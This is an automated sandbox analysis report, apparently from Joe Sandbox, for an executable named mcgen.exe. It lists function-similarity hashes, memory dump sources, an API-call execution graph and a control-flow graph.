                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                    • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                                    • Instruction ID: 326c804f9ed91e212e193face0bc717c0d54ada3775640560c011b1c09c7000b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F841F222A1C68246FB749F39A40137A66A8EBC0BFAF144235EF5C87AD5DE3CD481C701
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F290B6
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F2A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9CE
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F2A9B8: GetLastError.KERNEL32(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9D8
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6B9F1CC15), ref: 00007FF6B9F290D4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                    • API String ID: 3580290477-1592112586
                                                                                                                                                                                                                                                                    • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                                    • Instruction ID: 6af4073ac59bd0a823662f74e2229b8f1a017ed0249755092404b8d909520134
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72419336A08B9686EB14DF2AA5502BC7798FF447E1B558035FB4D83B96DF3CE4818340
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                                    • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                    • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                                    • Instruction ID: 39120bcc615643187dfe85dabb80f2d62d89841071a4c5f70367bdffee845544
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81418F72A18B8581DB208F29E8443A97768FB987A5F844135EB4DC7B98EF3CD441CB40
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                                                    • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                    • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                                                    • Instruction ID: 6457545dadfc2f7c1521202a3a2a400a52e6d4f8885a859d1e4ac2a350bf8dec
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA21D5A2A182C182FB209F19D05427D73B9FB84B59FA54035E78D83694DF7CD5458B41
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                                    • Instruction ID: 492c609f12f35da35d619d08c5e28ef130d6ea5b87879ba3c471e621a8288ac2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51115E32608B9182EB218F29F40026977E4FB88BA5F684234DF8D47755DF3CC9518B40
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                                                    • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                    • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                    • Instruction ID: 56a018d703fd0a684fe754a5d441f691186667da3ab274935f858053ab2bff23
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2017C2291C24286FB30AF68946627E73A8EF8576AF841036E75DC3691DF3CE544CA19

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:6%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                    Signature Coverage:4.4%
                                                                                                                                                                                                                                                                    Total number of Nodes:228
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:48
                                                                                                                                                                                                                                                                    execution_graph 21033 7ffd9413b600 21034 7ffd9413b626 21033->21034 21037 7ffd94130da0 21034->21037 21036 7ffd9413b667 21038 7ffd94130dcc 21037->21038 21039 7ffd94130dd1 21037->21039 21041 7ffd941549e0 21038->21041 21039->21036 21042 7ffd941549f9 21041->21042 21044 7ffd94154a05 21041->21044 21045 7ffd94154910 21042->21045 21044->21039 21046 7ffd9415494a 21045->21046 21049 7ffd9415495a 21045->21049 21051 7ffd94154450 21046->21051 21047 7ffd941549ad 21047->21044 21049->21047 21050 7ffd94154450 9 API calls 21049->21050 21050->21049 21052 7ffd9415450c 21051->21052 21057 7ffd9415453a 21052->21057 21058 7ffd941545f8 21052->21058 21062 7ffd940f3820 21052->21062 21054 7ffd94154594 21055 7ffd9415459a 21054->21055 21054->21058 21056 7ffd941545cf 00007FFDAC063010 21055->21056 21055->21057 21056->21057 21057->21049 21058->21057 21066 7ffd9414cfb0 21058->21066 21060 7ffd94154827 21060->21057 21074 7ffd9412e520 8 API calls 21060->21074 21065 7ffd940f3857 21062->21065 21063 7ffd940f38b9 21063->21054 21065->21063 21075 7ffd940f3400 21065->21075 21067 7ffd9414cfdd 21066->21067 21073 7ffd9414cfe6 21066->21073 21067->21060 21070 7ffd9414d5f4 21070->21060 21071 7ffd9414d45d 21071->21070 21072 7ffd9414d61d 00007FFDAC063010 21071->21072 21072->21070 21073->21067 21073->21071 21099 7ffd941552a0 21073->21099 21103 7ffd94108ff0 21073->21103 21074->21057 21080 7ffd940e9d10 21075->21080 21077 7ffd940f3411 21078 7ffd940f3432 21077->21078 21084 7ffd940ea0e0 21077->21084 21078->21065 21081 7ffd940e9d40 21080->21081 21082 7ffd940e9dd1 21080->21082 21081->21082 21088 7ffd940dd9f0 21081->21088 21082->21077 21085 7ffd940ea135 21084->21085 21087 7ffd940ea102 21084->21087 21085->21087 21095 7ffd940e8060 21085->21095 21087->21078 21089 7ffd940dda1d 21088->21089 21093 7ffd940dda6a 21088->21093 21091 7ffd940dda53 00007FFDAC063010 21089->21091 21092 7ffd940dda33 00007FFDAC063010 21089->21092 21090 7ffd940dda93 ReadFile 21090->21093 21094 7ffd940dda38 21090->21094 21091->21093 21092->21094 21093->21090 21093->21094 21094->21082 21096 7ffd940e808f 21095->21096 21097 7ffd940e80ac 21096->21097 21098 7ffd940dd9f0 3 API calls 21096->21098 21097->21087 21098->21097 21100 7ffd941552d8 21099->21100 21102 7ffd9415532e 21099->21102 21100->21073 21102->21100 21109 7ffd94154cf0 21102->21109 21104 7ffd94109004 21103->21104 21105 7ffd94109017 21103->21105 21104->21073 21105->21104 21107 7ffd941090f6 21105->21107 21117 7ffd941554c0 00007FFDAC063010 00007FFDAC063010 ReadFile 00007FFDAC063010 00007FFDAC063010 21105->21117 21107->21104 21108 7ffd94109183 00007FFDAC063010 21107->21108 21108->21104 21112 7ffd94154d64 21109->21112 21110 7ffd94154f94 21114 7ffd94155025 00007FFDAC063010 21110->21114 21116 7ffd9415503a 21110->21116 21111 7ffd94154ddf 21111->21102 21112->21110 21112->21111 21113 7ffd94154f74 00007FFDAC063010 21112->21113 21113->21110 21114->21116 21115 7ffd940f3820 3 API calls 21115->21116 21116->21111 21116->21115 21117->21105 21118 7ffd9412e700 21119 7ffd9412e750 21118->21119 21120 7ffd9412e7fb 21119->21120 21122 7ffd9412e950 21119->21122 21131 7ffd9412e8fb 21120->21131 21132 7ffd940f22e0 21120->21132 21123 7ffd9412ec1f 21122->21123 21127 7ffd9412eab4 21122->21127 21122->21131 21125 7ffd940f22e0 10 API calls 21123->21125 21124 7ffd9412e8b0 21130 7ffd94154910 9 API calls 21124->21130 21124->21131 21126 7ffd9412ec46 21125->21126 21126->21124 21129 7ffd9412ec80 00007FFDAC063010 21126->21129 21128 7ffd9412eb8d 00007FFDAC063010 21127->21128 21127->21131 21128->21131 21129->21124 21130->21131 21134 7ffd940f2334 21132->21134 21136 7ffd940f248f 00007FFDAC063010 21134->21136 21137 7ffd940f249d 21134->21137 21138 7ffd940f2456 21134->21138 21135 7ffd940f26f5 21135->21138 21139 7ffd940dd9f0 3 API calls 21135->21139 21136->21137 21137->21138 21140 7ffd940e92c0 21137->21140 21138->21124 21139->21138 21141 7ffd940e9345 21140->21141 21148 7ffd940e93a0 21140->21148 21142 7ffd940e9385 00007FFDAC063010 21141->21142 21141->21148 21149 7ffd940e95d2 21141->21149 21142->21148 21143 7ffd940e9465 00007FFDAC063010 21144 7ffd940e963b 21143->21144 21145 7ffd940e9487 00007FFDAC063010 21143->21145 21146 7ffd940e963e 00007FFDAC063010 00007FFDAC063010 21144->21146 21145->21146 21147 7ffd940e9689 21146->21147 21147->21149 21151 7ffd940dffe0 21147->21151 21148->21143 21148->21147 21148->21148 21148->21149 21149->21135 21153 7ffd940e0031 21151->21153 21152 7ffd940e03b8 21152->21149 21153->21152 21154 7ffd940e0200 CreateFileW 21153->21154 21154->21153 21155 7ffda33414bf 21156 7ffda339e960 21155->21156 21157 7ffda339f1c1 SetLastError 21156->21157 21158 7ffda339f1d5 21156->21158 21157->21158 21159 7ff6b9f13360 21162 7ff6b9f16350 21159->21162 21161 7ff6b9f1336e 21164 7ff6b9f16365 21162->21164 21163 7ff6b9f163aa 21163->21161 21164->21163 21165 7ff6b9f1648a GetLastError 21164->21165 21165->21163 21166 7ffd948a5dd0 21167 7ffd948a69da 21166->21167 21170 7ffd948a5de8 21166->21170 21168 7ffd948a68e7 LoadLibraryA 21169 7ffd948a6901 21168->21169 21169->21170 21173 7ffd948a6920 GetProcAddress 21169->21173 21170->21168 21172 7ffd948a6942 VirtualProtect VirtualProtect 21170->21172 21172->21167 21173->21169 21174 7ffd948a6937 21173->21174 21175 7ff6b9f363c4 21176 7ff6b9f363db 21175->21176 21177 7ff6b9f363f9 21175->21177 21178 7ff6b9f363e0 _invalid_parameter_noinfo 21176->21178 21177->21176 21179 7ff6b9f36415 21177->21179 21181 7ff6b9f363ee 21178->21181 21182 7ff6b9f369d4 21179->21182 21183 7ff6b9f36a1b 21182->21183 21184 7ff6b9f36a86 CreateFileW 21183->21184 21192 7ff6b9f36a49 21183->21192 21185 7ff6b9f36b6c GetFileType 21184->21185 21186 7ff6b9f36af1 21184->21186 21187 7ff6b9f36b79 GetLastError 21185->21187 21193 7ff6b9f36bca 21185->21193 21188 7ff6b9f36b39 GetLastError 21186->21188 21190 7ff6b9f36aff CreateFileW 21186->21190 21189 7ff6b9f24eec 21187->21189 21188->21192 21191 7ff6b9f36b88 CloseHandle 21189->21191 21190->21185 21190->21188 21191->21192 21196 7ff6b9f36bba 21191->21196 21192->21181 21193->21192 21194 7ff6b9f36d0c CloseHandle CreateFileW 21193->21194 21195 7ff6b9f36d53 GetLastError 21194->21195 21194->21196 21195->21196 21196->21192 21197 7ffda334112c 21198 7ffda334ef00 21197->21198 21201 7ffda334ef30 21198->21201 21200 7ffda334ef1a 21202 7ffda3341325 21201->21202 21203 7ffda334ef50 SetLastError 21202->21203 21204 7ffda334ef70 21203->21204 21204->21200 21205 7ff6b9f2c1a4 21206 7ff6b9f2c1cb 21205->21206 21207 7ff6b9f2c1e2 SetFilePointerEx 21206->21207 21209 7ff6b9f2c1d1 21206->21209 21208 7ff6b9f2c1fa GetLastError 21207->21208 21207->21209 21208->21209 21210 7ffd940f5bd0 21211 7ffd940f5be6 21210->21211 21212 7ffd940f5c1f 21210->21212 21215 7ffd940f1fa0 21212->21215 21214 7ffd940f5c6d 21216 7ffd940f2004 21215->21216 21217 7ffd940f1fbd 21215->21217 21219 7ffd940ea0e0 3 API calls 21216->21219 21217->21214 21218 7ffd940f2015 21218->21214 21219->21218 21220 7ff6b9f339ec 21223 7ff6b9f2ec08 21220->21223 21222 7ff6b9f33a10 21226 7ff6b9f2ec19 21223->21226 21224 7ff6b9f2ec4e HeapAlloc 21225 7ff6b9f2ec68 21224->21225 21224->21226 21225->21222 21226->21224 21226->21225 21227 7ff6b9f2b9ac 21228 7ff6b9f2ba06 21227->21228 21230 7ff6b9f2b9d6 21227->21230 21229 7ff6b9f2ba32 _invalid_parameter_noinfo 21228->21229 21228->21230 21229->21230 21231 7ffda33414f1 21233 7ffda3387b60 21231->21233 21232 7ffda3387d70 SetLastError 21232->21233 21234 7ffda3387c05 21232->21234 21233->21232 21233->21234 21235 7ff6b9f1ccac 21236 7ff6b9f1ccc0 21235->21236 21237 7ff6b9f1ccc8 __scrt_acquire_startup_lock 21236->21237 21242 7ff6b9f1cd0b 21236->21242 21239 7ff6b9f1cce6 21237->21239 21237->21242 21238 7ff6b9f1cd3c __scrt_release_startup_lock 21241 7ff6b9f1cd48 21238->21241 21239->21238 21239->21242 21240 7ff6b9f1cd91 __scrt_get_show_window_mode 21240->21242 21241->21240 21243 7ff6b9f11950 21244 7ff6b9f11985 21243->21244 21247 7ff6b9f119e9 21244->21247 21249 7ff6b9f2040c 21244->21249 21246 7ff6b9f11a20 21246->21247 21248 7ff6b9f2040c _fread_nolock 3 API calls 21246->21248 21248->21247 21252 7ff6b9f2042c 21249->21252 21251 7ff6b9f20424 21251->21246 21253 7ff6b9f20456 21252->21253 21258 7ff6b9f20485 21252->21258 21254 7ff6b9f204a2 21253->21254 21255 7ff6b9f20465 21253->21255 21253->21258 21259 7ff6b9f201ac 21254->21259 21256 7ff6b9f2047a _invalid_parameter_noinfo 21255->21256 21256->21258 21258->21251 21261 7ff6b9f201f5 21259->21261 21262 7ff6b9f201db 21259->21262 21260 7ff6b9f201f0 _invalid_parameter_noinfo 21260->21261 21261->21258 21262->21261 21263 7ff6b9f201e5 21262->21263 21264 7ff6b9f202e1 _invalid_parameter_noinfo 21262->21264 21263->21260 21264->21262 21265 7ff6b9f11470 21266 7ff6b9f11493 21265->21266 21267 7ff6b9f11538 21266->21267 21270 7ff6b9f1154b 21266->21270 21271 7ff6b9f1149b 21266->21271 21272 7ff6b9f11210 21267->21272 21269 7ff6b9f2040c _fread_nolock 3 API calls 21269->21270 21270->21269 21270->21271 21275 7ff6b9f11268 21272->21275 21273 7ff6b9f2040c _fread_nolock 3 API calls 21273->21275 21274 7ff6b9f1126f 21274->21271 21275->21273 21275->21274 21276 7ff6b9f2a9f4 21277 7ff6b9f2aa10 21276->21277 21279 7ff6b9f2aa45 21277->21279 21280 7ff6b9f2abc8 21277->21280 21281 7ff6b9f2abe4 21280->21281 21282 7ff6b9f2ac33 CloseHandle 21281->21282 21284 7ff6b9f2abea 21281->21284 21283 7ff6b9f2ac40 GetLastError 21282->21283 21282->21284 21283->21284 21284->21279 21285 7ffda334127b 21287 7ffda3388a40 21285->21287 21286 7ffda3388ac3 SetLastError 21286->21287 21288 7ffda3388b27 21286->21288 21287->21286 21287->21288 21289 7ffd940e1240 GetSystemInfo 21290 7ffd940e1274 21289->21290

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 78 7ffd940e92c0-7ffd940e933f 79 7ffd940e9345-7ffd940e934f 78->79 80 7ffd940e949d-7ffd940e94b3 78->80 79->80 83 7ffd940e9355-7ffd940e9358 79->83 81 7ffd940e94b9-7ffd940e94bf 80->81 82 7ffd940e93af-7ffd940e93f5 call 7ffd940d6180 80->82 81->82 85 7ffd940e94c5-7ffd940e94db call 7ffd940d6180 81->85 92 7ffd940e93fb-7ffd940e945f call 7ffd9420382c 82->92 93 7ffd940e9a8e-7ffd940e9a91 82->93 83->81 84 7ffd940e935e 83->84 87 7ffd940e9365-7ffd940e936e 84->87 95 7ffd940e94e1-7ffd940e94fc 85->95 96 7ffd940e9aee 85->96 87->87 90 7ffd940e9370-7ffd940e937f call 7ffd940d6180 87->90 90->96 104 7ffd940e9385-7ffd940e939b 00007FFDAC063010 90->104 108 7ffd940e9788-7ffd940e9798 92->108 109 7ffd940e9465-7ffd940e9481 00007FFDAC063010 92->109 93->96 97 7ffd940e9a93-7ffd940e9a9a 93->97 112 7ffd940e9516-7ffd940e951d 95->112 113 7ffd940e94fe-7ffd940e950f 95->113 100 7ffd940e9af3-7ffd940e9b0a 96->100 101 7ffd940e9a9c-7ffd940e9aa6 97->101 102 7ffd940e9ae5 97->102 106 7ffd940e9aa8 101->106 107 7ffd940e9aae-7ffd940e9adb 101->107 102->96 111 7ffd940e93a0-7ffd940e93a7 104->111 106->107 107->96 132 7ffd940e9add-7ffd940e9ae3 107->132 110 7ffd940e96df-7ffd940e9704 108->110 114 7ffd940e963b 109->114 115 7ffd940e9487-7ffd940e9498 00007FFDAC063010 109->115 118 7ffd940e970a-7ffd940e970f 110->118 119 7ffd940e983f 110->119 111->111 120 7ffd940e93a9 111->120 121 7ffd940e9520-7ffd940e9527 112->121 113->112 117 7ffd940e963e-7ffd940e9687 00007FFDAC063010 * 2 114->117 115->117 123 7ffd940e9689-7ffd940e9690 117->123 124 7ffd940e96dd 117->124 118->119 122 7ffd940e9715-7ffd940e9741 call 7ffd940dffe0 118->122 125 7ffd940e9844-7ffd940e9852 119->125 120->82 121->121 126 7ffd940e9529-7ffd940e9530 121->126 133 7ffd940e9744-7ffd940e9764 122->133 128 7ffd940e977a-7ffd940e9783 123->128 129 7ffd940e9696-7ffd940e96a0 123->129 124->110 130 7ffd940e9855-7ffd940e9858 125->130 131 7ffd940e9537-7ffd940e953e 126->131 128->124 134 7ffd940e96a8-7ffd940e96d5 129->134 135 7ffd940e96a2 129->135 136 7ffd940e990b-7ffd940e9915 130->136 137 7ffd940e985e-7ffd940e9879 call 7ffd940e8840 130->137 131->131 138 7ffd940e9540-7ffd940e9557 131->138 132->96 141 7ffd940e983a-7ffd940e983d 133->141 142 7ffd940e976a-7ffd940e9774 133->142 134->124 176 7ffd940e96d7 134->176 135->134 139 7ffd940e9917-7ffd940e9920 136->139 140 7ffd940e9923-7ffd940e9936 call 7ffd940e4700 136->140 137->136 163 7ffd940e987f-7ffd940e9903 137->163 144 7ffd940e9559 138->144 145 7ffd940e95a7-7ffd940e95ae 138->145 139->140 170 7ffd940e993c-7ffd940e9946 140->170 171 7ffd940e9a80-7ffd940e9a8c 140->171 141->130 152 7ffd940e9776-7ffd940e9778 142->152 153 7ffd940e979d-7ffd940e97a0 142->153 155 7ffd940e9560-7ffd940e9567 144->155 149 7ffd940e95d2-7ffd940e95d9 145->149 150 7ffd940e95b0-7ffd940e95b7 145->150 160 7ffd940e95db-7ffd940e95e5 149->160 161 7ffd940e962a 149->161 150->82 158 7ffd940e95bd-7ffd940e95cc call 7ffd94195b50 150->158 162 7ffd940e97a2-7ffd940e97aa 152->162 153->162 156 7ffd940e9570-7ffd940e9579 155->156 156->156 164 7ffd940e957b-7ffd940e9589 156->164 158->82 158->149 172 7ffd940e95e7 160->172 173 7ffd940e95ed-7ffd940e961a 160->173 178 7ffd940e9633-7ffd940e9636 161->178 167 7ffd940e97ac-7ffd940e97c0 call 7ffd940e7c10 162->167 168 7ffd940e97ce-7ffd940e97e4 call 7ffd94196b40 162->168 183 7ffd940e9969-7ffd940e996f 163->183 184 7ffd940e9905 163->184 175 7ffd940e9590-7ffd940e9599 164->175 167->168 192 7ffd940e97c2-7ffd940e97c7 167->192 193 7ffd940e97e6-7ffd940e97fb call 7ffd9414e010 168->193 194 7ffd940e97fd 168->194 181 7ffd940e9948 170->181 182 7ffd940e994e-7ffd940e9961 170->182 171->100 172->173 173->178 201 7ffd940e961c-7ffd940e9625 173->201 175->175 185 7ffd940e959b-7ffd940e95a5 175->185 176->124 178->100 181->182 182->183 190 7ffd940e9998-7ffd940e99a8 183->190 191 7ffd940e9971-7ffd940e9994 183->191 184->136 185->145 185->155 205 7ffd940e99aa 190->205 206 7ffd940e99b0-7ffd940e99e1 190->206 191->190 192->168 196 7ffd940e97ff-7ffd940e9804 193->196 194->196 199 7ffd940e9806-7ffd940e981c call 7ffd94196b40 196->199 200 7ffd940e9832-7ffd940e9838 196->200 199->141 211 7ffd940e981e-7ffd940e9830 call 7ffd9414e010 199->211 200->125 201->100 205->206 209 7ffd940e99e3-7ffd940e99f2 206->209 210 7ffd940e99f4-7ffd940e99fb 206->210 212 7ffd940e99ff-7ffd940e9a21 call 7ffd940e7c10 209->212 210->212 211->141 211->200 217 7ffd940e9a29-7ffd940e9a2c 212->217 218 7ffd940e9a23-7ffd940e9a27 212->218 219 7ffd940e9a33 217->219 220 7ffd940e9a2e-7ffd940e9a31 217->220 221 7ffd940e9a37-7ffd940e9a49 218->221 219->221 220->219 220->221 222 7ffd940e9a4b-7ffd940e9a52 221->222 223 7ffd940e9a54-7ffd940e9a66 221->223 224 7ffd940e9a6a-7ffd940e9a7e 222->224 223->224 224->100
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
